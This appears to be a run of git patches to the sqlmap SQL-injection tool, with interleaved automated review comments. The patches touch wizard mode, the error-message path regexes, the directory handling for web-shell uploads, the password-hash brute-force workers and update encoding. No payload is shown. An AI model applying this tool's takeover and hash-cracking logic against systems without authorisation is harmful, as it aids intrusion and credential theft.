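Review bot: The new `elif "url = url.strip()" in excMsg:` branch in `main` keys on a fragment of a source line rather than on an exception type, so it fires for any traceback whose text happens to contain that line, and it writes the whole `excMsg` to stdout before the contact message. Since the commit title calls this a temporary patch for #2947, the branch should carry a marker so it is removed once the issue is reproduced, e.g. `# TODO: temporary diagnostic for #2947, remove once the root cause is found` above the `elif`. The runtime string `"as he is trying to reproduce it for long time"` also reads awkwardly ("for a long time"). `main` continues outside the hunk.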
@@ -224,7 +224,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -3e2e790c370442c3d98eaa88a3523b15 sqlmap.py +082aa29ab77c647a0d3830c07279d437 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 93859fdc42836ce0b837dd9bd86b1fdcef9db52f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Feb 2018 13:37:19 +0100 Subject: [PATCH 040/428] Fixes #2948 --- lib/core/settings.py | 2 +- thirdparty/clientform/clientform.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4b9a44d4c29..0c5ed00b34c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.17" +VERSION = "1.2.2.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/clientform/clientform.py b/thirdparty/clientform/clientform.py index 2c2a25f1496..59d2d59ca65 100644 --- a/thirdparty/clientform/clientform.py +++ b/thirdparty/clientform/clientform.py 
@@ -2455,7 +2455,7 @@ def __init__(self, type, name, attrs, index=None): # IE5 defaults SUBMIT value to "Submit Query"; Firebird 0.6 leaves it # blank, Konqueror 3.1 defaults to "Submit". HTML spec. doesn't seem # to define this. - if self.value is None and not self.disabled: self.value = "" + if self.value is None and not self.disabled and not self.readonly: self.value = "" self.readonly = True def get_labels(self): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 21877d09f89..aca0595c90e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -616fd4427943e75033dcf128e11fcaff lib/core/settings.py +94fc756abb87d40cc78a9a26232b9136 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -326,7 +326,7 @@ ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py 6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py -658da0466b798cc70f48f35fe49b7813 thirdparty/clientform/clientform.py +3c1b0d627e98643b317244ecfd240bb5 thirdparty/clientform/clientform.py 722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py 0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py 93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py From d99151ce5a59d2f3ed8cc4dce97d5c0832df50f8 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 27 Feb 2018 12:37:45 +0100 Subject: [PATCH 041/428] Minor update for --wizard mode --- lib/controller/controller.py | 3 +++ lib/core/common.py | 8 ++++---- lib/core/option.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 15 insertions(+), 9 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 298fca10651..27708c86784 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -158,6 +158,9 @@ def _formatInjection(inj): return data def _showInjections(): + if conf.wizard and kb.wizardMode: + kb.wizardMode = False + if kb.testQueryCount > 0: header = "sqlmap identified the following injection point(s) with " header += "a total of %d HTTP(s) requests" % kb.testQueryCount diff --git a/lib/core/common.py b/lib/core/common.py index 5b74d90eec8..6b36d1ec02f 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -912,7 +912,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= message = "" if not kb.get("threadException"): - if forceOutput or not getCurrentThreadData().disableStdOut: + if forceOutput or not (getCurrentThreadData().disableStdOut or kb.get("wizardMode")): if kb.get("multiThreadMode"): logging._acquireLock() @@ -1018,7 +1018,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) if retVal: - dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=True, bold=True) + dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=not kb.wizardMode, bold=True) debugMsg = "used the given answer" logger.debug(debugMsg) 
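Review bot: The `dataToStdout` hunk reads the new flag defensively as `kb.get("wizardMode")`, while the `readInput` hunk here and the two on the next line use the attribute form `kb.wizardMode`; if `readInput` can run before `_setKnowledgeBaseAttributes` has populated `kb` (the default `kb.wizardMode = False` is added in the option.py hunk on the next line), the attribute form raises where the `get` form returns None, so `kb.get("wizardMode")` at all four call sites would be the consistent choice. Note also that the interactive prompt `dataToStdout("\r%s" % message, forceOutput=not kb.wizardMode, bold=True)` is now silenced in wizard mode while `raw_input()` still blocks; this is presumably safe only because wizard mode forces batch mode somewhere outside these hunks, and a one-line comment next to the prompt stating that dependency would help the next reader. `dataToStdout` and `readInput` both start and end outside the hunks.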
@@ -1032,7 +1032,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): else: options = unicode() - dataToStdout("\r%s%s\n" % (message, options), forceOutput=True, bold=True) + dataToStdout("\r%s%s\n" % (message, options), forceOutput=not kb.wizardMode, bold=True) debugMsg = "used the default behavior, running in batch mode" logger.debug(debugMsg) @@ -1045,7 +1045,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): if conf.get("beep"): beep() - dataToStdout("\r%s" % message, forceOutput=True, bold=True) + dataToStdout("\r%s" % message, forceOutput=not kb.wizardMode, bold=True) kb.prependFlag = False retVal = raw_input().strip() or default diff --git a/lib/core/option.py b/lib/core/option.py index d2dc4eaf17f..0cfc3caa19d 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2038,6 +2038,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.uChar = NULL kb.unionDuplicates = False kb.wafSpecificResponse = None + kb.wizardMode = False kb.xpCmdshellAvailable = False if flushAll: @@ -2119,6 +2120,8 @@ def _useWizardInterface(): dataToStdout("\nsqlmap is running, please wait..\n\n") + kb.wizardMode = True + def _saveConfig(): """ Saves the command line options to a sqlmap configuration INI file diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c5ed00b34c..0f1f3aecd80 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.18" +VERSION = "1.2.2.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aca0595c90e..721d36e6944 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -22,12 +22,12 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
 b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
 0f581182871148b0456a691ae85b04c0 lib/controller/action.py
 a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py
-f0e3f93f6a5275812e4d0c3e3a2a3701 lib/controller/controller.py
+9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py
 a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
 e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py
 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py
-62580fa31d29a79aa1e4715e425a147c lib/core/common.py
+863d9c00a7684db29005705d6dcc36b9 lib/core/common.py
 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py
 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
@@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py
 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
 458a194764805cd8312c14ecd4be4d1e lib/core/log.py
 63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py
-12f9b2435f4967562770be248cf50843 lib/core/option.py
+a377168b153725d3677924040b7861f4 lib/core/option.py
 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py
 ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-94fc756abb87d40cc78a9a26232b9136 lib/core/settings.py
+56665472f845f83f11d802dfc422dce5 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
From 9df16f3eb21d60883d9375bb999768c562a19a3f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar Date: Tue, 27 Feb 2018 12:49:05 +0100 Subject: [PATCH 042/428] Bug fix (regex for paths included full error message) --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0f1f3aecd80..b0fd326d615 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.19" +VERSION = "1.2.2.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -316,7 +316,7 @@ SESSION_SQLITE_FILE = "session.sqlite" # Regular expressions used for finding file paths in error messages -FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"(?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"href=['\"]file://(?P/[^'\"]+)") +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"in (?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.~-]+)", r"href=['\"]file://(?P/[^'\"]+)") # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 721d36e6944..7e27069772f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
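Review bot: The fix adds an `in ` anchor to the second pattern of `FILE_PATH_REGEXES`, but the first pattern keeps the same unanchored `[^<>]+?` prefix before ` on line \d+`, so under leftmost-match semantics it still captures everything from the start of a plain-text error message up to ` on line` — the symptom the commit title describes — whenever that pattern matches. If all patterns in the tuple are applied to the page, the first one likely needs the same anchoring; if it is meant for a different error format only, a comment above the tuple saying which format each pattern targets would make that explicit, e.g. `# one pattern per observed error format; keep each anchored so only the path is captured`. The `# Regular expressions used for finding file paths in error messages` comment could carry that note.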
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -56665472f845f83f11d802dfc422dce5 lib/core/settings.py +a9fdac60617e8496fd19c9d9449b3de7 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From b25f2bfa456fb8e44bbb4ffb644ca36421fae1b7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 27 Feb 2018 12:57:48 +0100 Subject: [PATCH 043/428] Minor patch (not not upload to / directories) --- lib/core/settings.py | 2 +- lib/takeover/web.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b0fd326d615..d764185be53 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.20" +VERSION = "1.2.2.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 2395b06b22b..617d67a5ad1 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -259,6 +259,7 @@ def webInit(self): directories = list(oset(directories)) path = urlparse.urlparse(conf.url).path or '/' + path = re.sub(r"/[^/]*\.\w+\Z", '/', path) if path != '/': _ = [] for directory in directories: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7e27069772f..92d4192fa3e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
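Review bot: The new `path = re.sub(r"/[^/]*\.\w+\Z", '/', path)` in `webInit` strips a trailing file name from the target URL path only when it ends in a `\w+` extension, so a path ending in an extension-less script name (or one with a non-word extension) is still treated as a directory; the intent is not obvious from the line itself. A comment such as `# drop a trailing file name (e.g. "/dir/index.php" -> "/dir/") so the candidate is a directory, not a file path` would record it, and the extension-less case deserves either a mention or handling. `webInit` starts and ends outside the hunk.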
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a9fdac60617e8496fd19c9d9449b3de7 lib/core/settings.py +781efdc7fb3d938985783a00d9932616 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -85,7 +85,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py 0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -19d2b9d1159ce809907ba71c4fae0d4e lib/takeover/web.py +746f400dfa6dc1139f14c44574d6b948 lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py From 6402d2ec57599647eea3d50e3e0f0d3985cd038c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Feb 2018 09:44:45 +0100 Subject: [PATCH 044/428] Fixes #2952 --- lib/core/settings.py | 2 +- lib/utils/hash.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d764185be53..452e5f585d9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.21" +VERSION = "1.2.2.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index bafe2a80138..7548c29fde3 100644 
--- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -16,6 +16,9 @@ # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) _ = multiprocessing.Queue() + + # problems with ctypes (Reference: https://github.com/sqlmapproject/sqlmap/issues/2952) + _ = multiprocessing.Value('i') except (ImportError, OSError): pass else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 92d4192fa3e..6ca78d76626 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -781efdc7fb3d938985783a00d9932616 lib/core/settings.py +5c87716f367de486b4e26974517f95cb lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -105,7 +105,7 @@ a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py -29dee8f54cfb39feb0545d237542f866 lib/utils/hash.py +56b62f4d8811f42b45b5f2f8e6e0a99e lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From ec6de40a8ddda284f1be61c6ec9a2f69b9a290c3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 2 Mar 2018 23:38:07 +0100 Subject: [PATCH 045/428] Fixes #2958 --- lib/core/settings.py | 2 +- lib/utils/hash.py | 7 ++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 452e5f585d9..e6b2c979a6d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
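Review bot: The new `_ = multiprocessing.Value('i')` probe only helps if the ctypes failure from #2952 surfaces as `ImportError` or `OSError`, which is all the surrounding `except (ImportError, OSError):` catches; if the reported failure raises something else, the probe moves the crash from hash cracking to module import. The new comment should state the exception type seen in the issue so the `except` tuple can be checked against it, e.g. `# problems with ctypes (#2952): the failing call raises <observed exception type> — keep the except clause in sync`. The surrounding try/except runs past the hunk on both sides.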
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.22" +VERSION = "1.2.3.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 7548c29fde3..508d3a9ca5b 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -722,6 +722,8 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc if not attack_info: break + count += 1 + if not isinstance(word, basestring): continue @@ -731,8 +733,6 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc try: current = __functions__[hash_regex](password=word, uppercase=False) - count += 1 - if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item @@ -797,7 +797,6 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found if found.value: break - current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 if not isinstance(word, basestring): @@ -807,6 +806,8 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found word = word + suffix try: + current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) + if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6ca78d76626..61684682238 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
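Review bot: In `_bruteProcessVariantB`, moving `current = __functions__[hash_regex](password=word, uppercase=False, **kwargs)` inside the `try` means whatever the `except` below (outside the hunk) catches now also covers the hash computation, so a word that makes the hash function raise is skipped instead of taking down the worker; that is presumably the #2958 fix, but nothing in the hunk says so. Moving `count += 1` ahead of the `isinstance(word, basestring)` check in both variants also means skipped words are now counted, which is consistent between A and B but changes what `count` reports. A comment on the moved line such as `# hashing can raise on unexpected input (#2958); such words are counted and skipped via the except below` would record the intent. Both functions start and end outside the hunks.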
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5c87716f367de486b4e26974517f95cb lib/core/settings.py +ae4670ba5c8569d10ae0a55f2284f11e lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -105,7 +105,7 @@ a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py -56b62f4d8811f42b45b5f2f8e6e0a99e lib/utils/hash.py +55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From 34d2fb1c8f0d0ea03b68d6c14d4f5ca7b5294333 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 3 Mar 2018 00:01:26 +0100 Subject: [PATCH 046/428] Fixes #2957 --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e6b2c979a6d..1aec86149e6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.0" +VERSION = "1.2.3.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1c62fa3b040..c8c4109fe68 100644 --- a/lib/request/connect.py 
+++ b/lib/request/connect.py @@ -718,7 +718,7 @@ class _(dict): else: logger.debug(warnMsg) return Connect._retryProxy(**kwargs) - elif kb.testMode: + elif kb.testMode or kb.multiThreadMode: logger.critical(warnMsg) return None, None, None else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 61684682238..80aa3b138fa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ae4670ba5c8569d10ae0a55f2284f11e lib/core/settings.py +8f9ed47a90b8d4b1c11b7e94b3d2e75b lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -b3c3b71e9d4aeaa2ece681cabefc953d lib/request/connect.py +cbe4c7513501e8edbed9d5d3af9bdc1d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From a369f612072c5d0dd4a734d810b8489ad28148b4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 3 Mar 2018 00:27:21 +0100 Subject: [PATCH 047/428] Fixes #2956 --- lib/core/settings.py | 2 +- lib/core/update.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1aec86149e6..cd02c1e8067 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
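Review bot: With `elif kb.testMode or kb.multiThreadMode:` a failed connection in multi-threaded mode now logs a critical message and returns `None, None, None` instead of reaching the `else:` branch (outside the hunk, presumably raising), so every caller on the threaded path must cope with a `None` page, and a persistent outage now yields one critical line per failing request per thread rather than stopping the run. If that is the intended trade-off, a comment on the branch such as `# in multi-threaded mode raising here would only kill one worker; report and let the caller treat None as "no response"` documents it; otherwise the callers' handling of the `None` tuple needs checking. The enclosing function starts well outside the hunk.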
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.1" +VERSION = "1.2.3.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index fee57e8e41e..2da80dfd60d 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -20,6 +20,7 @@ from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import UNICODE_ENCODING def update(): if not conf.updateAll: @@ -42,7 +43,7 @@ def update(): dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) try: - process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/ + process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) pollProcess(process, True) stdout, stderr = process.communicate() success = not process.returncode diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 80aa3b138fa..19311787a1c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
